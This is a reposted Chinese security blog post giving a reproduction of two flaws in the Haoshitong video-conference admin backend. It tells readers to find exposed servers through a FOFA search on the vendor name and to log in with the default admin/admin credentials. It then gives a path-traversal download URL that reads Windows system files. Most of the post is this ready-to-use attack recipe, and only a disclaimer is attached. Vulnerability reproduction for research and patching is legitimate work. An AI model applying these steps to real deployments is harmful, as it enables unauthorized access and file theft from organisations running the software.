好视通视频会议-视频后台管理-弱口令+任意文件下载

admin
admin
admin
139662
文章
114
评论
2022年8月28日09:19:32评论188 views字数 548阅读1分49秒阅读模式

前言

好视通视频会议-视频后台管理-弱口令+任意文件下载
好视通视频会议-视频后台管理-弱口令+任意文件下载




由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,文章作者不为此承担任何责任。






好视通视频会议-视频后台管理-弱口令+任意文件下载
好视通视频会议-视频后台管理-弱口令+任意文件下载


漏洞点

  • 弱口令  admin/ admin

  • 任意文件下载 /register/toDownload.do?fileName=敏感文件路径

漏洞复现

1、在fofa上搜索"深圳银澎云计算有限公司"。

好视通视频会议-视频后台管理-弱口令+任意文件下载

2、 访问链接,尝试弱口令 admin/admin,发现存在弱口令,可直接登录后台管理。

好视通视频会议-视频后台管理-弱口令+任意文件下载

好视通视频会议-视频后台管理-弱口令+任意文件下载

3、访问敏感文件路径,可以造成任意文件下载漏洞。

/register/toDownload.do?fileName=../../../../../../../../../../../../../../windows/win.ini

好视通视频会议-视频后台管理-弱口令+任意文件下载

好视通视频会议-视频后台管理-弱口令+任意文件下载

往期精彩推荐
好视通视频会议-视频后台管理-弱口令+任意文件下载


记一次搭建靶场渗透过程(1)

记一次搭建靶场渗透过程(2)

记一次搭建靶场渗透过程(3)

GoldenEye 靶场渗透测试

好视通视频会议-视频后台管理-弱口令+任意文件下载

好视通视频会议-视频后台管理-弱口令+任意文件下载

           团队介绍

银河护卫队super,是一个致力于红队攻防实战、内网渗透、代码审计、安卓逆向、安全运维等技术干货分享的队伍,定期分享常用渗透工具、复现教程等资源。欢迎有想法、乐于分享的具备互联网分享精神的安全人士进行交流学习。
好视通视频会议-视频后台管理-弱口令+任意文件下载

点击关注银河护卫队super

原文始发于微信公众号(银河护卫队super):好视通视频会议-视频后台管理-弱口令+任意文件下载

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月28日09:19:32
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   好视通视频会议-视频后台管理-弱口令+任意文件下载https://cn-sec.com/archives/763581.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息